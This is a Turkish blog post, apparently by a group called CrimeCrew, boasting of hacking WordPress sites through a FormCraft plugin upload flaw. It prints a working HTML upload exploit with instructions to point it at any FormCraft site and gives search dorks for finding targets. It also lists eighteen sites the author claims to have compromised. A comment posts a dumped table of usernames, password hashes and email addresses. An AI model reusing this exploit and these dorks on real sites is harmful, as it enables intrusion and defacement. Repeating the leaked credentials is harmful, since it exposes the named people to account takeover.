WordpressTema.Com // CrimeStory
CrimeStory Yazı Dizisine devam Ediyoruz..
Bu Siteyi hedef Almaktaki Amacım tema dosyalarına backdoor enjekte edip tema kullanan diğer web yayıncılarını hacklemekti..
Fakat sistemde bunun için yeterli güvenlik açığı olmadığı için bu defa sadece txt dosyası eklemek ile yetindim..
http://golgeler.net/view-%3E388921
Hikayeyi Baştan Anlatayım..
Siteyi test Etmeye scripti Bulmaktan başladım.
zaten site tasarımından kendini ifşa ediyordu..
Sitede Wordpress Kullanılmıştı.
Wordpress de bulunan güncel bir güvenlik açığı yok...
Fakat yayıncıların kullandığı (theme-plugins) gibi üçüncü taraf uygulamalarda güvenlik açığı olabilir.
Bunu Test etmek için linux'da wpscan aracı var..
Fakat Ben Windows kullandığım için (https://hackertarget.com/wordpress-security-scan/) aracını kullanmayı tercih ettim.
<html>
<Head>
<title>CrimeCrew Uploader</title>
<text>Wordpress Exploit // FormCraft</text>
<form method="POST" action="http://www.wordpresstema.com//wp-content/plugins/formcraft/file-upload/server/content/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
</Head>
</html>
inurl:plugins/formcraft
Dorklarını Kullanabilirsiniz..
Gelecek Story'lerde Görüşmek Üzere..
Hacklediğim Diğer Siteler
http://www.sosyalimci.com
http://www.pusulaswiss.ch
http://bursaceviritercume.com
http://cansigorta.org
http://urper.com.tr
http://www.darmanas.com
http://www.the-resume-coach.com
http://www.risetreeconsultancy.com
http://goldeneggrecruitment.co.uk
http://mission4recruitment.com
http://www.weighandwin.com
http://www.sevikmakina.com.tr
http://stoller.com.tr
https://inspirechanges.com
http://welcomehomecoalition.org
http://www.spageddiesitaliankitchen.com
http://www.gravitytrails.com
http://www.wordpresstema.com
Bu Siteyi hedef Almaktaki Amacım tema dosyalarına backdoor enjekte edip tema kullanan diğer web yayıncılarını hacklemekti..
Fakat sistemde bunun için yeterli güvenlik açığı olmadığı için bu defa sadece txt dosyası eklemek ile yetindim..
http://golgeler.net/view-%3E388921
Hikayeyi Baştan Anlatayım..
Siteyi test Etmeye scripti Bulmaktan başladım.
zaten site tasarımından kendini ifşa ediyordu..
Sitede Wordpress Kullanılmıştı.
Wordpress de bulunan güncel bir güvenlik açığı yok...
Fakat yayıncıların kullandığı (theme-plugins) gibi üçüncü taraf uygulamalarda güvenlik açığı olabilir.
Bunu Test etmek için linux'da wpscan aracı var..
Fakat Ben Windows kullandığım için (https://hackertarget.com/wordpress-security-scan/) aracını kullanmayı tercih ettim.
[+]Formcraft
[+]download-manager
Bu iki aracıda Exploit Db'de aradığımda.
Formcraft aracında daha önceden bulunmuş ve post yöntemiyle dosya upload etmeye yarayan bir açık farkettim.
Bu açığı istismar etmek için kullanılan html kodlarını kullanarak sisteme "a.txt" adında İçinde "Hacked By CrimeCrew" Yazan bir metin eklemeyi başardım..
Fakat Sisteme shell Atıp root olmayı denediğimde aynı sonucu alamadım..
Muhtemelen upload sayfası sadece belirli formatlara yanıt veriyordu..
TamperData İle denediğimde Sonuç Yine hüsran Oldu..
Ancak Sonuç Olarak Kullandığı Plugins Yüzünden Wordpresstema.com hacklendi.
Daha Sonra Dork Yazarak Aynı Scripti Formcraft'ı kullanan diğer sistemleri Bulup Onlarıda Hackledim..
18 site hackledikten sonra aynı exploiti kullanmaktan sıkıldım.
<Head>
<title>CrimeCrew Uploader</title>
<text>Wordpress Exploit // FormCraft</text>
<form method="POST" action="http://www.wordpresstema.com//wp-content/plugins/formcraft/file-upload/server/content/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
</Head>
</html>
Exploit'te Koyu yazılı kısmı değiştirip html olarak kaydedip istediğiniz formcraft kullanan siteye dosya upload edebilirsiniz..
Formcraft Kullanan diğer siteleri bulmak için;
intext:"powered by formcraft" inurl:plugins/formcraft
Dorklarını Kullanabilirsiniz..
Gelecek Story'lerde Görüşmek Üzere..
Hacklediğim Diğer Siteler
http://www.sosyalimci.com
http://www.pusulaswiss.ch
http://bursaceviritercume.com
http://cansigorta.org
http://urper.com.tr
http://www.darmanas.com
http://www.the-resume-coach.com
http://www.risetreeconsultancy.com
http://goldeneggrecruitment.co.uk
http://mission4recruitment.com
http://www.weighandwin.com
http://www.sevikmakina.com.tr
http://stoller.com.tr
https://inspirechanges.com
http://welcomehomecoalition.org
http://www.spageddiesitaliankitchen.com
http://www.gravitytrails.com
http://www.wordpresstema.com
http://kariyer.izu.edu.tr/wp-content/plugins/formcraft/file-upload/server/content/files/15745a55402c8d---Hacked.txt
YanıtlaSilİstanbul Zaim Üniverstesi Uyarıldı..
https://twitter.com/CrimeCrewTr/status/735459761542553600
+------------+--------------+------------------------+
YanıtlaSil| username | password | email |
+------------+--------------+------------------------+
| ertan | wszmyselkpOl | ertanyildiz@live.com |
| hakan | xMLlxs3ewpI= | hakan@casella.com.tr |
| admin | mZKlkpim | info@aktifinternet.com |
| aktifmedya | mZKlkpim | info@aktifmedya.net |
| casella | wszmysfV1MTf | info@casella.com.tr |
| ismail | lJKplQ== | ismail@aktifmedya.net |
| selcuk | xMLlxs3ewpI= | selcuk@casella.com.tr |
+------------+--------------+------------------------+
Başkan bişeyler yapmaya çalıştım olmuşmu? Cevap verirsen sevinirim.
http://i.hizliresim.com/jnQnGL.png
YanıtlaSilAfferin..
SilLinux kullanabiliyorsan daha iyi şeyler yapabilirsin kali linux taki yazılımları kurmaya bak.
SilS.a. Blogundaki yazıları gördüm ve çok beğendim uzun zamandır seni takip ediyorum. CrimeCrew e katılmak istiyorum. Yaşım 17 11. Sınıftayım. Beni kabul edersen iyi şeyler başaracağımızı düşünüyorum. Saygılar...
YanıtlaSilFacebook hesabına mesaj attım bu arada.